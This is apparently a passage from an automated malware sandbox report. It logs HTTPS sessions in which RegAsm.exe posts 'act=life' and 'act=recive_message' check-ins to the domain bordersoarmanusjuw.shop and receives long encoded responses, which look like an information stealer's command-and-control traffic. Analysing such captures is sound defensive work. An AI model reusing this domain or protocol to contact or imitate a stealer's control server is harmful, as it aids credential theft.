                                                                                                                                            Data Ascii: fuSbm2Dz3+tj4KWR/ZODq555bQeJzkmPMgVLqx2MzYMx8YnXOaOYw2fltpzj2rqtgnxlGcanL513aSDyO4/NqHb60c8jodnuZuurmfiQjK+ee20HicZFgT0AQflB5Kr6ffyXmGztmKwCgc/f9YDP9s4ySAySzE7ADAJF5VTy5oAa6d//CviwiQGqo5OywM3ugXNqCZTASYE3D0TuXOym6HzzlZxq4tXmeOCkl/eZhaTMPApk7Y9DmnlZCati862
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 5a 39 6b 37 74 37 6e 5a 2b 32 76 6e 4f 43 4b 6a 4b 71 43 66 69 4a 42 37 71 51 76 77 6a 34 5a 43 37 4d 52 70 49 50 2f 63 75 61 58 6c 43 47 4a 73 2f 30 6b 67 73 2b 47 6d 76 50 6b 37 6f 74 2b 49 6c 66 45 6a 30 53 4d 4e 51 70 4d 34 46 6a 67 6f 75 68 38 2f 5a 2b 5a 61 4f 33 51 37 6d 33 34 71 5a 72 36 6b 6f 61 72 67 48 39 68 48 59 58 4f 42 4d 78 52 61 69 43 72 56 50 7a 6d 73 44 4f 32 74 71 52 57 77 70 69 4b 41 66 58 71 39 35 6d 42 35 38 58 6e 4d 6d 55 44 78 70 63 47 77 6a 67 4a 54 4f 56 58 39 71 6a 36 66 2f 47 52 6b 57 6e 70 33 2b 35 6b 35 4c 61 58 38 35 69 42 6f 59 52 37 5a 67 36 43 79 30 69 46 65 55 38 6a 67 44 69 6b 6f 66 41 78 72 74 50 58 53 65 4c 43 2b 43 6a 45 72 35 2f 31 69 4a 6d 31 7a 42 6f 4a 45 4d 69 6e 4c 35 74 52 61 69 43 72 56 4f 6a 6d 73 44 4f 32
                                                                                                                                            Data Ascii: Z9k7t7nZ+2vnOCKjKqCfiJB7qQvwj4ZC7MRpIP/cuaXlCGJs/0kgs+GmvPk7ot+IlfEj0SMNQpM4Fjgouh8/Z+ZaO3Q7m34qZr6koargH9hHYXOBMxRaiCrVPzmsDO2tqRWwpiKAfXq95mB58XnMmUDxpcGwjgJTOVX9qj6f/GRkWnp3+5k5LaX85iBoYR7Zg6Cy0iFeU8jgDikofAxrtPXSeLC+CjEr5/1iJm1zBoJEMinL5tRaiCrVOjmsDO2
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 33 54 36 57 48 70 72 70 62 78 6c 49 6d 76 67 6e 4a 73 44 38 61 42 4c 4f 6c 53 51 55 7a 7a 45 37 7a 6b 71 46 48 39 68 34 4a 69 38 64 37 6c 5a 71 72 4d 39 4f 33 57 35 38 57 56 47 67 6c 6b 78 73 68 49 77 6d 46 44 43 2b 56 42 34 4b 66 6f 65 66 2b 64 6e 47 6e 7a 33 2b 56 68 35 4b 71 55 39 70 53 47 70 59 56 33 62 67 36 4e 78 6b 47 47 4d 77 64 47 71 78 32 4d 7a 59 4d 78 38 59 6e 58 4f 61 4f 59 7a 6d 6e 6c 72 39 2b 61 38 35 44 67 35 42 6c 37 5a 2b 32 6b 42 49 55 31 51 52 4f 70 45 2b 4f 75 34 48 2f 31 6c 35 78 74 37 64 6e 72 62 4f 2b 73 6d 50 32 66 68 71 6d 4d 64 48 41 49 69 38 5a 45 69 54 41 4c 54 2b 70 59 70 4f 69 41 47 70 33 52 6b 48 6d 68 67 4b 41 71 32 4b 4f 4a 34 70 76 50 78 75 64 74 4c 47 54 75 70 46 33 71 55 6d 6f 4c 37 46 2b 6b 2f 71 6f 78 2b 34 4f 57 5a
                                                                                                                                            Data Ascii: 3T6WHprpbxlImvgnJsD8aBLOlSQUzzE7zkqFH9h4Ji8d7lZqrM9O3W58WVGglkxshIwmFDC+VB4Kfoef+dnGnz3+Vh5KqU9pSGpYV3bg6NxkGGMwdGqx2MzYMx8YnXOaOYzmnlr9+a85Dg5Bl7Z+2kBIU1QROpE+Ou4H/1l5xt7dnrbO+smP2fhqmMdHAIi8ZEiTALT+pYpOiAGp3RkHmhgKAq2KOJ4pvPxudtLGTupF3qUmoL7F+k/qox+4OWZ
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 6f 71 71 57 54 2f 5a 75 41 72 59 39 7a 61 42 32 55 77 30 32 4b 50 41 31 41 35 56 58 32 6f 4f 64 34 39 5a 4b 65 5a 75 6e 55 36 47 6e 74 35 4e 47 61 38 2b 54 75 69 32 6f 69 56 38 53 50 5a 35 55 70 44 41 75 44 4f 50 76 6f 67 42 72 76 2b 66 77 4b 6f 64 2f 75 4b 72 4c 6d 33 2f 71 56 68 36 53 49 64 57 38 49 67 4d 5a 57 69 7a 77 50 53 2b 39 59 36 36 44 73 63 76 61 44 6b 57 58 70 32 2b 39 6e 35 4b 65 62 73 74 62 6e 78 65 63 79 5a 52 66 47 6c 77 62 43 43 77 78 46 38 46 7a 6a 74 2b 49 78 6e 76 71 49 4c 34 6d 7a 2b 77 4b 42 7a 39 2f 31 6c 4d 2f 32 7a 6a 4a 6d 41 5a 54 45 52 59 6b 79 44 30 7a 6b 56 75 36 6d 35 33 58 31 6e 35 78 67 34 74 44 76 5a 2b 53 75 6c 76 75 66 67 36 71 4c 4d 69 78 6e 37 61 51 45 68 53 46 42 45 36 6b 54 7a 34 66 46 58 66 47 4c 31 77 6d 4b 78 36
                                                                                                                                            Data Ascii: oqqWT/ZuArY9zaB2Uw02KPA1A5VX2oOd49ZKeZunU6Gnt5NGa8+Tui2oiV8SPZ5UpDAuDOPvogBrv+fwKod/uKrLm3/qVh6SIdW8IgMZWizwPS+9Y66DscvaDkWXp2+9n5KebstbnxecyZRfGlwbCCwxF8Fzjt+IxnvqIL4mz+wKBz9/1lM/2zjJmAZTERYkyD0zkVu6m53X1n5xg4tDvZ+Sulvufg6qLMixn7aQEhSFBE6kTz4fFXfGL1wmKx6
                                                                                                                                            2024-04-21 13:31:22 UTC754INData Raw: 69 66 6d 5a 6a 4c 69 42 59 69 4a 6e 37 64 41 4b 36 6c 49 59 49 34 41 34 70 4b 48 6b 4d 61 37 54 31 32 66 6f 33 75 56 73 35 4c 61 61 39 4a 65 41 70 34 56 32 61 67 79 47 79 30 43 46 50 41 4a 48 34 46 54 6e 71 65 78 34 2b 4a 69 59 49 61 2b 77 69 51 47 71 6f 34 65 79 77 4d 33 75 72 57 6c 68 41 34 75 50 4c 4f 6b 6d 54 79 4f 41 53 6f 7a 4e 67 7a 48 78 6e 64 63 35 6f 35 6a 75 5a 4f 2b 6b 6c 66 53 63 69 71 69 47 64 32 49 45 68 63 42 41 68 44 30 4f 53 2b 42 61 35 61 44 74 65 2f 32 58 6d 6d 4c 6e 33 71 49 6b 67 73 2f 30 73 70 2b 58 37 74 51 77 49 69 2b 64 77 6b 69 46 65 57 6b 67 39 42 32 4d 7a 66 45 5a 6e 66 72 58 5a 75 32 59 75 69 69 71 72 35 50 32 6e 34 2b 6a 6a 33 70 6e 43 34 7a 4b 52 49 6f 72 43 55 76 73 51 66 61 6d 34 58 54 36 6b 70 64 6c 35 39 48 6b 61 65 37
                                                                                                                                            Data Ascii: ifmZjLiBYiJn7dAK6lIYI4A4pKHkMa7T12fo3uVs5Laa9JeAp4V2agyGy0CFPAJH4FTnqex4+JiYIa+wiQGqo4eywM3urWlhA4uPLOkmTyOASozNgzHxndc5o5juZO+klfSciqiGd2IEhcBAhD0OS+Ba5aDte/2XmmLn3qIkgs/0sp+X7tQwIi+dwkiFeWkg9B2MzfEZnfrXZu2Yuiiqr5P2n4+jj3pnC4zKRIorCUvsQfam4XT6kpdl59Hkae7
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 31 61 31 38 0d 0a 38 52 6d 64 2b 74 64 6d 37 5a 69 36 4b 4b 71 70 6d 50 79 51 69 61 43 4b 59 47 34 41 67 4d 39 46 69 44 51 4e 51 4f 78 64 37 36 44 74 66 50 61 58 6b 57 58 6c 33 4f 78 70 71 75 72 33 6d 66 50 50 71 5a 51 79 4f 6b 33 47 36 47 6d 7a 65 79 4a 63 2f 56 6e 6a 71 76 35 36 39 35 4b 42 62 50 47 59 69 67 48 31 36 76 65 5a 67 65 66 46 35 7a 4a 6c 41 38 61 58 42 73 49 79 44 30 37 71 58 2b 36 68 35 6d 50 33 6d 35 74 67 35 74 2f 70 65 4f 47 32 6c 50 71 62 67 61 61 46 63 6d 77 50 68 38 4a 45 77 6e 64 70 49 49 41 54 34 37 36 6f 4b 62 54 52 73 6b 4c 32 7a 75 67 6f 79 62 4f 4a 2b 4a 2b 44 75 49 64 7a 59 52 6d 4c 33 77 54 71 55 68 34 46 67 7a 6a 39 7a 6f 4d 61 74 70 61 62 49 62 6d 61 6f 6d 48 6c 71 70 4c 35 6e 49 61 72 68 48 46 6e 43 6f 7a 44 53 49 4d 78 43
                                                                                                                                            Data Ascii: 1a188Rmd+tdm7Zi6KKqpmPyQiaCKYG4AgM9FiDQNQOxd76DtfPaXkWXl3Oxpqur3mfPPqZQyOk3G6GmzeyJc/Vnjqv5695KBbPGYigH16veZgefF5zJlA8aXBsIyD07qX+6h5mP3m5tg5t/peOG2lPqbgaaFcmwPh8JEwndpIIAT476oKbTRskL2zugoybOJ+J+DuIdzYRmL3wTqUh4Fgzj9zoMatpabIbmaomHlqpL5nIarhHFnCozDSIMxC
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 78 39 62 38 68 70 50 6e 38 66 71 2b 77 69 58 4f 43 7a 2f 53 79 6a 73 2f 32 7a 69 41 73 5a 2b 32 6b 42 4a 42 35 57 51 6d 72 46 4f 71 72 36 58 4c 34 6b 6f 56 7a 35 39 76 30 61 61 32 61 6f 64 4f 56 68 4b 4b 42 66 57 6b 78 75 4f 35 4a 69 54 55 4d 52 4f 42 74 32 72 50 72 66 2f 69 57 67 58 43 68 6c 6f 6f 42 67 65 53 51 73 73 44 4e 6c 38 77 36 49 6a 44 49 70 79 2f 70 65 52 6b 4c 73 78 47 6b 6b 2b 74 2f 2b 4a 61 42 63 4b 7a 35 37 32 48 6d 71 5a 44 35 32 4d 48 47 35 78 6b 69 43 63 61 58 42 74 4a 33 61 53 43 41 45 2b 43 33 71 43 6d 30 77 63 55 36 74 49 75 31 4f 72 6a 4d 39 4f 33 57 35 38 57 56 47 67 6c 6b 78 74 6b 45 32 6e 74 54 42 59 4d 34 6a 2b 62 36 4d 61 37 54 31 79 62 69 79 76 42 73 36 62 4b 63 74 61 61 78 6a 5a 74 6b 61 42 54 45 36 55 4f 54 4d 42 64 47 2b 57
                                                                                                                                            Data Ascii: x9b8hpPn8fq+wiXOCz/Syjs/2ziAsZ+2kBJB5WQmrFOqr6XL4koVz59v0aa2aodOVhKKBfWkxuO5JiTUMROBt2rPrf/iWgXChlooBgeSQssDNl8w6IjDIpy/peRkLsxGkk+t/+JaBcKz572HmqZD52MHG5xkiCcaXBtJ3aSCAE+C3qCm0wcU6tIu1OrjM9O3W58WVGglkxtkE2ntTBYM4j+b6Ma7T1ybiyvBs6bKctaaxjZtkaBTE6UOTMBdG+W


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.449744172.67.189.664435900C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:21 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                            Data Ascii: act=life
                                                                                                                                            2024-04-21 13:31:22 UTC810INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:22 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=0c6kuq9nujuin70ppgqqkps54s; expires=Thu, 15-Aug-2024 07:18:01 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GkHC65XrCrEMaaH%2FKaVb5wteIkRSKmA297nhXyPUfY4XkboGYP9Vjkl3a44YzA0xSrBQDt40rdt28Uwj%2BSNTbsQpW1UN5MgWXef6sikrR89OLETOoxLR8MejnUzemiENP5EYXHtGxPHIeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbe5af76455a-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                            Data Ascii: 2ok
                                                                                                                                            2024-04-21 13:31:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.449746172.67.189.664435856C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:22 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 49
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:22 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
                                                                                                                                            2024-04-21 13:31:22 UTC812INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:22 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=oap6rt9k31pj3cg7lga94acvtp; expires=Thu, 15-Aug-2024 07:18:01 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlQ0fa1ApR9XWV7xZqdfGw4LFO1SGMyMWDtSpfo%2BwZc9yc6AXwL9pzICjmLWqjrUszplSTc3RDf8F1h%2FOwAOR0DQQG6Lfxqy2s4Too73q6LDjowbKUVHOKVfQg%2BpW8yRzDSm9ps6rgWtIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbea1c1d0711-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:22 UTC557INData Raw: 35 30 38 0d 0a 33 79 61 75 65 76 54 7a 63 74 46 6a 54 6c 58 75 34 41 57 57 46 2f 42 6b 48 6c 6e 4a 32 73 66 71 4e 68 6f 4c 74 35 71 48 50 2b 36 6b 4c 4b 64 59 67 74 46 49 38 56 64 69 58 2b 66 43 64 76 4d 31 79 6b 52 71 4b 37 79 2f 36 2b 41 2f 4f 47 72 54 75 4c 30 66 69 4c 35 4b 33 52 2f 59 2b 58 76 7a 44 6a 5a 33 31 4d 42 65 6e 42 36 4c 62 68 64 51 36 37 2b 70 79 41 77 36 4b 63 44 2f 35 56 71 57 71 30 50 41 43 5a 32 63 48 4a 45 4f 4b 79 47 50 6a 57 54 6c 66 4e 34 4e 63 58 76 6c 30 4d 37 6a 46 48 39 78 6c 61 43 6e 48 61 4f 36 55 73 38 33 6c 59 41 5a 38 30 39 45 58 4f 66 43 59 4f 49 31 79 6b 51 38 42 65 75 71 70 70 68 58 64 33 6a 72 75 4c 31 45 73 76 31 50 32 68 2b 47 6b 67 61 34 44 43 41 6d 73 73 49 2f 6f 43 66 41 56 43 35 70 74 50 6a 4e 34 30 73 51 41 75
                                                                                                                                            Data Ascii: 5083yauevTzctFjTlXu4AWWF/BkHlnJ2sfqNhoLt5qHP+6kLKdYgtFI8VdiX+fCdvM1ykRqK7y/6+A/OGrTuL0fiL5K3R/Y+XvzDjZ31MBenB6LbhdQ67+pyAw6KcD/5VqWq0PACZ2cHJEOKyGPjWTlfN4NcXvl0M7jFH9xlaCnHaO6Us83lYAZ809EXOfCYOI1ykQ8BeuqpphXd3jruL1Esv1P2h+Gkga4DCAmssI/oCfAVC5ptPjN40sQAu
                                                                                                                                            2024-04-21 13:31:22 UTC738INData Raw: 48 59 75 78 42 4a 52 61 31 70 63 65 73 67 77 73 4a 59 53 4a 62 50 46 6e 6d 51 39 78 4e 71 75 31 72 34 64 58 65 47 37 66 38 75 70 58 69 4c 42 4a 79 68 69 57 30 56 37 62 61 6b 64 33 69 35 6f 6e 72 44 66 53 4a 58 6b 72 72 4c 53 7a 79 6d 34 34 41 62 37 6e 71 7a 62 4f 2f 79 79 6e 41 66 37 36 65 2f 4d 47 49 48 66 55 77 43 66 38 63 4a 45 46 64 7a 53 6f 73 4b 36 61 56 47 70 76 32 50 33 33 57 34 6d 7a 54 73 38 4b 6e 4a 38 57 73 41 67 6e 50 6f 6d 46 59 37 51 37 2b 6d 30 58 65 36 79 67 35 64 41 57 4f 45 6a 59 38 2b 6c 58 6d 37 30 45 70 48 4f 4a 33 33 6a 59 47 45 52 63 35 38 4a 67 2b 44 58 4b 52 44 77 2f 71 72 79 6b 6a 46 70 32 62 64 6e 2b 36 31 43 44 75 30 37 4d 48 35 79 5a 47 4c 49 4d 4a 7a 69 4d 68 32 72 77 63 35 34 48 65 58 76 6c 30 4d 37 6a 46 48 39 78 6c 61 43
                                                                                                                                            Data Ascii: HYuxBJRa1pcesgwsJYSJbPFnmQ9xNqu1r4dXeG7f8upXiLBJyhiW0V7bakd3i5onrDfSJXkrrLSzym44Ab7nqzbO/yynAf76e/MGIHfUwCf8cJEFdzSosK6aVGpv2P33W4mzTs8KnJ8WsAgnPomFY7Q7+m0Xe6yg5dAWOEjY8+lXm70EpHOJ33jYGERc58Jg+DXKRDw/qrykjFp2bdn+61CDu07MH5yZGLIMJziMh2rwc54HeXvl0M7jFH9xlaC
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 33 34 65 34 0d 0a 44 2f 31 70 52 79 37 6b 36 51 79 30 63 70 35 47 4a 48 6e 72 76 71 6d 4e 57 33 5a 70 32 2f 6e 6f 57 34 69 77 52 4e 34 65 68 4a 59 52 73 41 49 71 4d 6f 69 43 5a 76 46 77 6c 67 35 34 4e 36 54 34 36 2b 41 2f 45 79 6e 53 34 4b 55 46 7a 76 31 72 32 78 61 41 6d 67 53 30 45 54 30 4e 7a 72 64 6b 2b 6e 75 56 45 44 78 54 77 4b 66 72 34 44 39 68 41 62 36 54 70 56 71 41 2f 52 79 4f 57 4a 2b 44 41 72 63 48 4a 7a 79 65 6b 47 33 77 64 4a 4d 42 63 7a 71 67 76 61 6d 43 58 33 78 37 33 66 48 6d 54 34 69 39 54 38 59 65 31 74 39 34 32 47 70 73 4d 4a 54 43 50 37 59 31 74 67 74 73 4e 36 43 75 6f 70 68 68 65 32 66 62 2f 2f 4d 64 35 4e 5a 62 67 6e 44 39 69 48 6a 59 61 6d 77 77 67 4d 49 2f 74 6a 57 64 43 58 4d 7a 71 37 6d 68 68 56 42 35 5a 4e 6e 78 35 6c 47 41 74
                                                                                                                                            Data Ascii: 34e4D/1pRy7k6Qy0cp5GJHnrvqmNW3Zp2/noW4iwRN4ehJYRsAIqMoiCZvFwlg54N6T46+A/EynS4KUFzv1r2xaAmgS0ET0Nzrdk+nuVEDxTwKfr4D9hAb6TpVqA/RyOWJ+DArcHJzyekG3wdJMBczqgvamCX3x73fHmT4i9T8Ye1t942GpsMJTCP7Y1tgtsN6Cuophhe2fb//Md5NZbgnD9iHjYamwwgMI/tjWdCXMzq7mhhVB5ZNnx5lGAt
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 6d 6e 42 79 34 44 57 34 43 6a 34 78 70 38 32 50 53 62 68 63 6b 35 64 44 4f 6b 54 77 54 41 70 58 2f 36 52 33 55 2f 77 54 44 47 5a 75 62 47 37 30 4e 4c 54 65 49 67 57 33 30 65 70 63 41 64 44 4b 72 71 71 4b 48 56 58 6c 69 33 76 58 72 57 49 32 34 51 34 78 57 2f 76 70 37 38 77 59 30 64 39 54 41 4a 39 6c 63 71 45 59 55 55 4c 54 32 7a 65 4e 4e 45 41 4b 2b 75 4f 4a 52 7a 4f 55 47 6a 42 79 63 6b 52 32 35 43 69 4d 30 69 34 78 6e 2b 58 2b 41 44 6e 77 37 70 62 36 6b 68 46 46 35 5a 64 62 71 36 56 75 42 75 30 7a 65 57 4e 6a 35 65 39 68 42 4b 79 2f 4d 32 69 57 30 56 5a 6b 4b 66 7a 65 71 76 2b 65 70 58 6e 74 69 32 62 72 51 58 6f 4b 7a 51 39 70 59 2f 76 6f 50 2f 57 6c 48 4c 75 54 70 44 4c 52 79 6e 6b 59 6b 65 65 75 38 6f 59 52 55 66 32 66 52 2f 75 68 61 68 37 42 4f 79 78
                                                                                                                                            Data Ascii: mnBy4DW4Cj4xp82PSbhck5dDOkTwTApX/6R3U/wTDGZubG70NLTeIgW30epcAdDKrqqKHVXli3vXrWI24Q4xW/vp78wY0d9TAJ9lcqEYUULT2zeNNEAK+uOJRzOUGjByckR25CiM0i4xn+X+ADnw7pb6khFF5Zdbq6VuBu0zeWNj5e9hBKy/M2iW0VZkKfzeqv+epXnti2brQXoKzQ9pY/voP/WlHLuTpDLRynkYkeeu8oYRUf2fR/uhah7BOyx
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 73 67 51 70 4e 6f 69 4f 62 66 4a 32 6b 51 6c 7a 4e 4b 50 34 36 2b 41 2f 45 79 6e 53 34 4b 55 46 7a 76 31 68 32 78 4f 59 6c 31 44 62 61 6a 4e 35 35 4f 6c 2b 6e 42 37 35 52 6e 73 33 36 2b 44 6e 79 46 68 78 62 39 50 39 36 56 79 4b 74 55 48 45 48 4a 65 58 46 72 41 4f 4b 44 4b 4e 6a 57 50 34 65 35 67 48 66 54 65 67 74 36 36 4e 46 44 59 42 76 70 4f 6c 57 70 54 39 48 49 35 59 70 35 49 47 70 42 45 67 64 2b 54 70 65 4c 6f 64 2b 52 38 55 55 4d 44 34 6f 6f 51 55 49 43 75 56 2b 66 64 58 68 72 4e 42 77 78 32 56 6e 68 65 2b 42 79 41 39 68 59 70 68 2b 33 79 41 42 58 41 31 72 4c 61 70 68 6c 6c 79 61 74 69 34 71 7a 58 6e 31 67 54 4c 41 4e 62 4a 55 76 4d 74 4b 7a 71 69 69 57 76 7a 4e 66 70 74 59 33 58 44 30 37 7a 67 50 78 4d 70 30 76 53 6c 42 63 37 39 53 4d 59 55 6e 35 45
                                                                                                                                            Data Ascii: sgQpNoiObfJ2kQlzNKP46+A/EynS4KUFzv1h2xOYl1DbajN55Ol+nB75Rns36+DnyFhxb9P96VyKtUHEHJeXFrAOKDKNjWP4e5gHfTegt66NFDYBvpOlWpT9HI5Yp5IGpBEgd+TpeLod+R8UUMD4ooQUICuV+fdXhrNBwx2Vnhe+ByA9hYph+3yABXA1rLaphllyati4qzXn1gTLANbJUvMtKzqiiWvzNfptY3XD07zgPxMp0vSlBc79SMYUn5E
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 44 32 45 6a 57 6a 6d 64 4a 30 50 65 7a 43 6d 74 36 75 4e 57 6d 70 75 33 76 50 74 56 49 4b 37 42 49 4a 77 2f 66 70 51 74 42 6c 73 62 38 37 43 55 66 64 37 6d 52 64 7a 4f 4b 66 34 7a 65 4e 4c 4e 67 47 2b 34 59 30 32 35 2f 31 44 77 46 6a 4f 30 31 43 2f 44 79 77 34 67 49 35 73 2f 48 53 65 43 48 73 2b 6f 72 43 74 6d 6c 56 38 59 64 54 32 36 6c 79 49 75 45 48 49 48 35 4b 58 48 2f 4e 50 52 46 7a 6e 77 6d 44 73 4e 63 70 45 50 42 53 73 72 59 53 79 46 42 41 43 79 72 61 4e 4e 70 58 56 4c 36 64 59 6b 5a 31 51 36 30 4e 73 50 59 65 47 5a 50 42 77 6e 51 64 39 50 62 6d 2f 72 4a 70 61 64 57 62 64 38 4f 78 63 69 4c 68 4a 79 68 53 63 6b 42 65 39 44 79 52 33 77 75 6f 4d 6e 7a 57 56 48 6a 78 6a 36 66 69 45 6d 45 39 71 66 39 6a 5a 36 46 4c 4d 31 53 2f 54 56 76 37 36 43 64 74 71
                                                                                                                                            Data Ascii: D2EjWjmdJ0PezCmt6uNWmpu3vPtVIK7BIJw/fpQtBlsb87CUfd7mRdzOKf4zeNLNgG+4Y025/1DwFjO01C/Dyw4gI5s/HSeCHs+orCtmlV8YdT26lyIuEHIH5KXH/NPRFznwmDsNcpEPBSsrYSyFBACyraNNpXVL6dYkZ1Q60NsPYeGZPBwnQd9Pbm/rJpadWbd8OxciLhJyhSckBe9DyR3wuoMnzWVHjxj6fiEmE9qf9jZ6FLM1S/TVv76Cdtq
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 74 76 38 48 79 53 41 6e 59 32 72 4c 69 67 68 56 46 38 5a 39 48 2f 35 56 47 44 75 6b 7a 44 48 4a 61 65 55 50 31 70 52 31 7a 4d 68 58 2b 30 4c 64 42 47 58 44 43 39 6d 61 75 44 52 6a 67 42 76 75 65 72 4e 65 65 6b 4c 4b 64 7a 31 70 59 63 38 31 6c 75 64 34 4b 4c 5a 76 78 37 6e 67 35 34 4b 61 75 7a 72 49 64 56 64 32 6e 57 2b 65 39 56 6e 72 74 45 78 78 43 52 6d 52 53 39 45 79 30 34 7a 4d 77 50 6e 78 37 53 41 57 52 37 38 2f 72 6c 75 55 4a 2f 62 74 71 36 7a 46 71 58 76 45 37 50 45 35 72 52 65 4e 67 65 59 6c 2f 6e 6d 77 2b 66 48 74 49 42 63 48 76 7a 2b 75 57 46 57 48 56 74 78 2f 54 6c 58 59 57 36 54 74 34 58 6d 5a 77 54 73 77 51 2b 4e 70 36 4e 62 50 46 32 6c 67 6c 7a 4e 36 4f 79 35 63 59 38 45 77 4b 56 2f 2f 30 64 31 50 38 45 34 42 75 48 6d 31 4b 55 47 7a 6f 77 67
                                                                                                                                            Data Ascii: tv8HySAnY2rLighVF8Z9H/5VGDukzDHJaeUP1pR1zMhX+0LdBGXDC9mauDRjgBvuerNeekLKdz1pYc81lud4KLZvx7ng54KauzrIdVd2nW+e9VnrtExxCRmRS9Ey04zMwPnx7SAWR78/rluUJ/btq6zFqXvE7PE5rReNgeYl/nmw+fHtIBcHvz+uWFWHVtx/TlXYW6Tt4XmZwTswQ+Np6NbPF2lglzN6Oy5cY8EwKV//0d1P8E4BuHm1KUGzowg
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 31 79 6b 51 38 47 4c 79 75 72 35 4d 55 45 41 4c 4b 74 6f 30 32 6c 64 55 76 70 31 69 52 6e 56 44 72 51 32 77 36 69 34 78 76 38 6e 75 55 46 48 41 30 72 62 69 6b 67 6c 6c 30 59 74 4c 32 37 6c 75 4a 73 45 54 4b 48 70 4b 56 46 4c 30 43 62 48 6e 6b 36 51 79 30 63 6f 70 47 4a 48 6e 72 6e 34 69 35 46 6c 74 2b 77 2f 4c 69 55 5a 71 32 52 63 38 4f 6d 34 46 51 32 32 6f 7a 65 65 54 70 66 70 77 65 2b 55 5a 37 4e 2b 76 67 35 38 68 66 64 6d 7a 55 39 4f 39 61 67 71 39 46 78 68 53 58 6c 68 65 34 45 79 63 6c 68 34 70 6b 2b 6e 32 62 42 6e 49 37 71 72 57 6c 79 42 6f 51 41 72 36 34 34 6b 58 4d 35 51 61 4d 50 62 57 47 42 72 6c 44 44 79 43 61 69 47 44 34 59 35 6b 48 66 79 32 6d 71 4f 58 67 50 32 63 6e 76 5a 50 38 4e 65 66 57 42 4d 73 55 31 73 6c 53 38 77 6f 6a 4f 59 47 4a 59 2f
                                                                                                                                            Data Ascii: 1ykQ8GLyur5MUEALKto02ldUvp1iRnVDrQ2w6i4xv8nuUFHA0rbikgll0YtL27luJsETKHpKVFL0CbHnk6Qy0copGJHnrn4i5Flt+w/LiUZq2Rc8Om4FQ22ozeeTpfpwe+UZ7N+vg58hfdmzU9O9agq9FxhSXlhe4Eyclh4pk+n2bBnI7qrWlyBoQAr644kXM5QaMPbWGBrlDDyCaiGD4Y5kHfy2mqOXgP2cnvZP8NefWBMsU1slS8wojOYGJY/
